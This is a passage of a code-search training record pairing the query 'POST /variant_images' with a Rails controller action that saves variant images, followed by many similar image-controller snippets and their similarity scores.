} | [
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image_url = ImageUrl.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_url }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @image }\n end\n end",
"def new\n @image = Image.new\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @image }\n end\n end",
"def new\n @variant = Variant.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @variant }\n end\n end",
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @property_image = PropertyImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @property_image }\n end\n end",
"def new\n @image_upload = ImageUpload.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_upload }\n end\n end",
"def new\n @motivational_image = MotivationalImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @motivational_image }\n end\n end",
"def new\n @image_gallery = ImageGallery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_gallery }\n end\n end",
"def new\n @image_section = ImageSection.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_section }\n end\n end",
"def new\n \n @page = Page.new\n @page.images.build\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @page }\n end\n end",
"def new\n @imovel = Imovel.new\n @imovel.images.build\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @imovel }\n end\n end",
"def new\n @slider_image = SliderImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def new\n @slider_image = SliderImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def new\n @estate_agent_image = EstateAgentsImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @estate_agent_image }\n end\n end",
"def new\n @photo = Photo.new\n\n render json: @photo\n end",
"def new\n @review_image = ReviewImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @review_image }\n end\n end",
"def new\n @category_image = CategoryImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @category_image }\n end\n end",
"def new\n @bgimage = Bgimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @bgimage }\n end\n end",
"def new\r\n @car_image = CarImage.new\r\n\r\n respond_to do |format|\r\n format.html # new.html.erb\r\n format.json { render json: @car_image }\r\n end\r\n end",
"def new\n @image_datum = ImageDatum.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_datum }\n end\n end",
"def new\n @slide_image = SlideImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @slide_image }\n end\n end",
"def new\n @pic = Pic.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @pic }\n end\n end",
"def new\n @flavours = @provider.get_flavors\n puts \"getting the flavors #{@flavours.inspect}\"\n @images = @provider.get_images\n puts \"getting the flavors #{@images.inspect}\"\n @instance = @provider.instances.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @instance }\n end\n end",
"def new\n @collage = Collage.new\n @images = Image.order('created_at DESC')\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @collage }\n end\n end",
"def new\n @image = @owner.images.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @photo = @allbum.photos.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @bwimage = Bwimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @bwimage }\n end\n end",
"def new\n @memberimage = Memberimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @memberimage }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @pictures_of_cat = PicturesOfCat.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @pictures_of_cat }\n end\n end",
"def new\n @picture = Picture.new\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @photo }\n end\n end",
"def new\n @foto = Foto.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @foto }\n end\n end",
"def new\n @match_image = MatchImage.new\n if params[:match_id]\n @match = Match.find(params[:match_id])\n end\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @match_image }\n end\n end",
"def new\n @shop_photo = ShopPhoto.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @shop_photo }\n end\n end",
"def new\n @s3_image = S3Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @s3_image }\n end\n end",
"def new\n @product = Product.new\n @product.photos.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @product }\n end\n end",
"def new\n @image_member = ImageMember.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_member }\n end\n end",
"def new\n @photo_library = PhotoLibrary.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo_library }\n end\n end",
"def new\n @garment_image = GarmentImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @garment_image }\n end\n end",
"def new\n @combined_image = CombinedImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @combined_image }\n end\n end",
"def new\n @banner_img = BannerImg.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @banner_img }\n end\n end",
"def new\n @photo = Photo.new \n \n #@photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @web_image = WebImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @web_image }\n end\n end",
"def new\n @hotel_pic = HotelPic.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @hotel_pic }\n end\n end",
"def new\n @property_picture = PropertyPicture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @property_picture }\n end\n end",
"def new\n @image = Image.new\n @image.user=@current_user\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json=>@picture}\n end\n end",
"def new\n repo = assets_repo\n @v_asset = repo.new\n\n respond_to do |format|\n format.html new.html.erb\n format.json { render json: @v_asset }\n end\n end",
"def new\n @picture = @museum.pictures.new #Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @gallery = Gallery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @gallery }\n end\n end",
"def new\n @gallery = Gallery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @gallery }\n end\n end",
"def new\n @admin_photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @admin_photo }\n end\n end",
"def new\n @gallery = Gallery.new(:public => true)\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @gallery }\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.json { render :json => { url: @image.image.url} }\n else\n \n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @sub_variant = SubVariant.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @sub_variant }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.js\n format.xml { render :xml => @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.js\n format.xml { render :xml => @image }\n end\n end",
"def new\n @gallery_image = @project.gallery_images.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @gallery_image }\n end\n end",
"def new\n @destination = Destination.new\n @destination.build_dest_image\n\n respond_to do |format|\n format.html # _new.html.erb\n format.json { render json: @destination }\n end\n end",
"def new\n @plate_photo = PlatePhoto.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @plate_photo }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @product = Product.new\n 5.times { @product.photos.build }\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @product }\n end \n end",
"def new\n @image = Image.new\n \n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @album = Album.find(params[:album_id])\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def create\n @photos = Photo.new(photos_params)\n if @photos.save\n render json: { id: @photos.id, url: @photos.gallery.url,\n size: @photos.gallery_file_size }\n else\n render json: { id: nil }\n end\n end",
"def new\n @fileversion = Fileversion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @fileversion }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @console_image }\n end\n end",
"def new\n @img = Img.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @img }\n end\n end",
"def new\n @image = @user.images.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @flavor = Flavor.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @flavor }\n end\n end",
"def new\n @photo1 = Photo1.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo1 }\n end\n end",
"def new\n @album = Album.find(params[:album_id])\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @photo }\n end\n end",
"def new\n @file_version = FileVersion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @file_version }\n end\n end",
"def new\n @store = Store.new\n @store.pictures.build\n @store.pictures.build\n @store.pictures.build\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @store }\n end\n end",
"def new\n @pinimage = Pinimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @pinimage }\n end\n end"
] | [
"0.7331562",
"0.7331562",
"0.7331562",
"0.7331562",
"0.7331562",
"0.7331562",
"0.7296701",
"0.72743815",
"0.7256295",
"0.71241343",
"0.71211594",
"0.7083276",
"0.70256233",
"0.70135015",
"0.69998044",
"0.6992117",
"0.6989176",
"0.6984019",
"0.697423",
"0.697423",
"0.6973233",
"0.6955786",
"0.6934131",
"0.6932445",
"0.6931763",
"0.6911567",
"0.6906291",
"0.6898929",
"0.68872726",
"0.68816876",
"0.68796176",
"0.68586147",
"0.682495",
"0.68231565",
"0.6799654",
"0.6781087",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.6778843",
"0.67365617",
"0.6727361",
"0.6727361",
"0.6727361",
"0.67162734",
"0.67162734",
"0.6713595",
"0.6708873",
"0.67028326",
"0.6699088",
"0.6693906",
"0.66865325",
"0.6654652",
"0.6646455",
"0.664642",
"0.66436696",
"0.66392833",
"0.6635906",
"0.6634227",
"0.6629399",
"0.662353",
"0.66112673",
"0.66096437",
"0.6595721",
"0.6595696",
"0.6595696",
"0.65932596",
"0.6580145",
"0.65766793",
"0.6571744",
"0.65709686",
"0.65709686",
"0.65680903",
"0.65614283",
"0.65569305",
"0.65501225",
"0.6541844",
"0.65396154",
"0.65369034",
"0.65364665",
"0.65349126",
"0.65348065",
"0.6534482",
"0.6518548",
"0.65145105",
"0.65141106",
"0.65132004",
"0.65063447",
"0.65055776",
"0.6492114",
"0.64817876"
] | 0.7732069 | 0 |
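The next row's `create` action relies on pre-Rails-4 mass assignment (`VariantImage.new(params[:variant_image])`) and copies the uploaded file into `image2` so it can be replicated to a second S3 account. On Rails 4+ the same action would need strong parameters; a minimal sketch, with attribute names taken from the action body and everything else assumed:

private

def variant_image_params
  # :image2 mirrors the duplication performed at the top of the action.
  params.require(:variant_image).permit(:variant_id, :image, :image2)
end

# the construction line then becomes:
# @variant_image = VariantImage.new(variant_image_params)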
POST /variant_images POST /variant_images.json | def create
  params[:variant_image][:image2] = params[:variant_image][:image] # duplicate the upload so it is replicated across both S3 accounts
  @variant_image = VariantImage.new(params[:variant_image])
  @variant = @variant_image.variant
  @product = @variant.product
respond_to do |format|
if @variant_image.save
format.html { redirect_to @variant, notice: 'Image added successfully.' }
format.js { redirect_to @variant_image, notice: 'Image added successfully.' }
format.json { render json: @variant_image, status: :created, location: @variant_image }
else
format.html { render action: "new" }
format.js { render action: "new" }
format.json { render json: @variant_image.errors, status: :unprocessable_entity }
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def index\n @variant_images = VariantImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variant_images }\n end\n end",
"def create\n @apartment = current_user.apartments.new(apartment_params)\n\n respond_to do |format|\n if @apartment.save\n if params[:images]\n # The magic is here ;)\n params[:images].each { |image|\n @apartment.pictures.create(image: image)\n }\n end\n format.html { redirect_to @apartment, notice: 'Propiedad creada correctamente.' }\n format.json { render :show, status: :created, location: @apartment }\n else\n format.html { render :new }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n # fetch tags from google vision API\n helpers.fetch_tags(image_params)\n\n @image.image_file.attach(image_params[:image_file])\n\n respond_to do |format|\n if @image.save()\n format.html { redirect_to @image, notice: \"Image was successfully created.\" }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_image\n @image = Image.create(image_path: params[:upload][:image])\n p @image\n render json: @image\n end",
"def create\n @image = Spree::Image.new(params[:image])\n\n respond_to do |format|\n if @upload.save\n format.html {\n render :json => [@image.to_jq_upload].to_json,\n :content_type => 'text/html',\n :layout => false\n }\n format.json { render json: {files: [@image.to_jq_upload]}, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def create\n @rent = Rent.new(rent_params)\n @rentpar = rent_params\n respond_to do |format|\n if @rent.save\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @rent.rent_images.create(rent_id: @rent.id, image:image)\n }\n \n end\n\n format.html { redirect_to @rent, notice: 'Rent was successfully created.' }\n format.json { render :show, status: :created, location: @rent }\n else\n format.html { render :new }\n format.json { render json: @rent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.json { render :json => { url: @image.image.url} }\n else\n \n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @results = []\n\n unless params[:files].nil?\n params[:files].each do |data|\n img = Image.new\n img.filename = data.original_filename\n img.data = data.read\n img.upload_id = params[:uuid]\n img.visitation_form_id = params[:formId]\n img.image_type = params[:imageType]\n img.content_type = data.content_type\n #img.temp_index = params[:birdIndex]\n img.bird_id = params[:birdId]\n\n if !img.save\n render :json => { :errors => img.errors.full_messages }, :status => 400 and return\n else\n @results << { name: img.filename, imageType: img.image_type, id: img.id }\n end\n end\n end\n\n render json: { files: @results }\n end",
"def create \n @image ||= Image.new(image_params)\n if @image.save\n render json: {\"url\" => @image.image_url(:resized), \"success\" => true}\n else\n render json: @image.errors, status: :unprocessable_entity\n end\n end",
"def create\n @smartphone = Smartphone.new(smartphone_params)\n\n respond_to do |format|\n if @smartphone.save\n if params[:images]\n params[:images].each do |val|\n @smartphone.pictures.create(image: val)\n end\n end\n\n format.html { redirect_to @smartphone, notice: 'Smartphone was successfully created.' }\n format.json { render :show, status: :created, location: @smartphone }\n else\n format.html { render :new }\n format.json { render json: @smartphone.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n image = Image.create(image_params)\n\n if image.new_record?\n render json: { errors: image.errors.messages }, status: 422\n else\n render json: image, status: 201\n end\n end",
"def create\n @spot = Spot.new(spot_params)\n\n respond_to do |format|\n if @spot.save\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n format.html { redirect_to [@country,@spot], notice: \"Spot was successfully created.\" }\n else\n format.html { render :new }\n end\n end\n end",
"def create\n @spot = Spot.new(spot_params)\n\n respond_to do |format|\n if @spot.save\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n format.html { redirect_to [@country,@spot], notice: \"Spot was successfully created.\" }\n else\n format.html { render :new }\n end\n end\n end",
"def get_images_data\t\t\t\t\t\t\n\t\t{ payload: { 'makes' => makes_dropdown, 'images' => images_array('none').compact}, success: true}\n\tend",
"def add_image\n obtain_product_image_params\n pi = ProductImage.new(picture: @image_params)\n @product.product_images << pi\n render json: @product.simple_info, status: :ok\n rescue => e\n render json: { error: e }, status: :bad_request\n end",
"def create\n create_params = product_image_params || {product_uuid: @product.uuid}\n @product_image = ProductImage.new(product_image_params)\n if @product_image.save\n render json: @product_image, status: 201\n else\n render_error 400, @product_image.errors.full_messages\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.json { render json: @image, status: :created, location: [:admin, @image] }\n else\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @estate_agent_image = EstateAgentsImage.new(params[:property_image])\n\n respond_to do |format|\n if @estate_agent_image.save\n format.html { redirect_to @estate_agent_image, notice: 'Property image was successfully created.' }\n format.json { render json: @estate_agent_image, status: :created, location: @estate_agent_image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @estate_agent_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to aquarium_images_url, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created }\n else\n format.html { render action: 'new' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n @item.images.delete_all\n unless params.require(:item)[:images_id].nil?\n params.require(:item)[:images_id].each do |id|\n image = Image.find_by_id(id)\n (@item.images << image) unless image.nil?\n end\n end\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n\n respond_to do |format|\n format.html # show.html.erb\n format.js\n format.json { render json: @variant_image }\n end\n end",
"def image_callback\n @image = Image.create(image_params)\n @lecture.update(image: @image)\n end",
"def create\n @gallery = find_gallery\n @gallery.save! unless @gallery.persisted?\n @image = Image.new params[:image]\n @image.image_gallery_id = @gallery.id\n @images = @gallery.images\n \n respond_to do |format|\n if @image.save \n format.js\n format.json { render json: @image, status: :created, location: @image }\n else\n format.js\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image_collection = ImageCollection.new(image_collection_params)\n\n respond_to do |format|\n if @image_collection.save\n image_collection_params[:attached_images].reject(&:empty?).each do |id|\n @image_collection.images << Image.find(id)\n end\n\n @image_collection.save\n\n format.html { redirect_to @image_collection, notice: 'Image collection was successfully created.' }\n format.json { render :show, status: :created, location: @image_collection }\n else\n format.html { render :new }\n format.json { render json: @image_collection.errors, status: :unprocessable_entity }\n end\n end\n end",
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def create\n @animal_image = AnimalImage.new(animal_image_params)\n\n respond_to do |format|\n if @animal_image.save\n format.html { redirect_to @animal_image, notice: \"Animal image was successfully created.\" }\n format.json { render :show, status: :created, location: @animal_image }\n else\n format.html { render :new }\n format.json { render json: @animal_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n image = PropertyImage.new()\n image.photo = params[:file]\n image.property_form = @property_form\n if image.save\n respond_to do |format|\n format.json do\n json = {id: image.id}\n render json: json\n end\n end\n end\n end",
"def create\n @icesled = Icesled.new(icesled_params)\n @icesled.manufacturer_id ||= Manufacturer.where(name: 'не указан', category: 'icesled').first_or_create.id\n respond_to do |format|\n if @icesled.save\n if params[:images]\n @icesled.gallery ||= Gallery.new\n params[:images].each do |image|\n @icesled.gallery.images.create(image: image)\n end\n unless @icesled.image_file_size\n @icesled.update(image: @icesled.gallery.images.first.image)\n end\n end\n format.html { redirect_to @icesled, notice: 'Icesled was successfully created.' }\n format.json { render :show, status: :created, location: @icesled }\n else\n format.html { render :new }\n format.json { render json: @icesled.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @apartment.update(apartment_params)\n if params[:images]\n # The magic is here ;)\n params[:images].each { |image|\n if (image!=nil)\n @apartment.pictures.create(image: image)\n \n end\n }\n end\n format.html { redirect_to @apartment, notice: 'La propiedad se actualizo correctamente.' }\n format.json { render :show, status: :ok, location: @apartment }\n else\n format.html { render :edit }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @sub_collection = SubCollection.new(sub_collection_params)\n\n respond_to do |format|\n if @sub_collection.save\n if not sub_collection_images_params[:sub_collection_images_attributes].nil?\n sub_collection_images_params[:sub_collection_images_attributes].each do |sci|\n @sub_collection.sub_collection_images.create(sub_collection_image: sci[:sub_collection_image])\n end\n end\n format.html { redirect_to @sub_collection, notice: 'Sub collection was successfully created.' }\n format.json { render :show, status: :created, location: @sub_collection }\n else\n @sub_collection.sub_collection_images.build\n format.html { render :new }\n format.json { render json: @sub_collection.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @imageable = find_imageable\n @image = @imageable.images.build(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: t('.notice', image: @image) }\n format.json\n else\n format.html { render :new }\n format.json {\n render json: @image.errors[:attachment], status: :unprocessable_entity\n }\n end\n end\n end",
"def create\n @photos = Photo.new(photos_params)\n if @photos.save\n render json: { id: @photos.id, url: @photos.gallery.url,\n size: @photos.gallery_file_size }\n else\n render json: { id: nil }\n end\n end",
"def create\n @vmimage = Vmimage.new(vmimage_params)\n # p \"debug\"\n # p vmimage_params\n # @vmimage.tag_list.add(vmimage_params.tag_list)\n respond_to do |format|\n if @vmimage.save\n format.html { redirect_to @vmimage, notice: 'Vmimage was successfully created.' }\n format.json { render action: 'show', status: :created, location: @vmimage }\n else\n format.html { render action: 'new' }\n format.json { render json: @vmimage.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_img\n result = RestaurantManage.upload_img(@restaurant, params[:qqfile], request.body.read)\n get_restaurant()\n render json: result\n end",
"def update\n @variant_image = VariantImage.find(params[:id])\n\n respond_to do |format|\n if @variant_image.update_attributes(params[:variant_image])\n format.html { redirect_to @variant_image, notice: 'Variant image was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_remote\n img = {}\n data = {}\n if params[:data].present?\n data = JSON.parse(params[:data]).symbolize_keys\n img = data[:image].symbolize_keys\n else\n img = params[:image]\n end\n model = @imageable.class\n former_image = @imageable.respond_to?(:images) ? nil : @imageable.image\n kind = img[:kind]\n kind = model::IMAGE_KINDS.keys.first if kind.blank? && model.const_defined?(:IMAGE_KINDS)\n image = Image.new(imageable: @imageable, kind: kind, legend: img[:legend].to_s, zoomable: (img[:zoomable].present? ? img[:zoomable] : true))\n if Figaro.env.s3_enabled.to_bool\n # Special field for carrierwave_direct's business\n image.img.key = data[:key]\n end\n if request.xhr?\n if image.save_and_process!\n former_image.try :destroy if former_image\n #image[:url] = image.img.url\n return render(json: image, status: :ok)\n end\n Rails.logger.error \"[Image Creation Error #{Time.zone.now.xmlschema}] #{image.errors.full_messages}\"\n errors = image.errors[:img]\n render json: [{ error: errors }], status: :error\n else\n if image.save_and_process!\n former_image.try :destroy if former_image\n #image[:url] = image.img.url\n if Figaro.env.s3_enabled.to_bool && Figaro.env.js_upload_enabled.to_bool && Figaro.env.js_s3_iframe_enabled.to_bool\n return render(nothing: true)\n end\n return redirect_to({ action: :assist, id: image })\n end\n Rails.logger.error \"[Image Creation Error #{Time.zone.now.xmlschema}] #{image.errors.full_messages}\"\n redirect_to parent_url, alert: \"L’image n’a pas pu être créée\"\n end\n end",
"def create\n @image = Image.new(params[:image])\n type = @image.url_type\n #response.headers[\"Content-type\"] = \"text/plain\"\n if @image.save\n render :text => [ @image.to_jq_upload(type, \"image\") ].to_json.to_s\n else \n render :text => [ @image.to_jq_upload(type, \"image\").merge({ :error => \"custom_failure\" }) ].to_json.to_s\n end\n end",
"def create\n @gallery = find_gallery\n @gallery.save! unless @gallery.persisted?\n @image = Image.new image_params\n @image.image_gallery_id = @gallery.id\n\n respond_to do |format|\n if @image.save\n format.js\n format.json { render json: @image, status: :created, location: @image }\n else\n format.js\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_multiple_images(product_id, variation_id, images_path, images_name)\n response, status = BeyondApi::Request.upload_by_form(@session,\n \"/products/#{product_id}/variations/#{variation_id}/images\",\n images_path,\n file_name: images_name)\n\n handle_response(response, status)\n end",
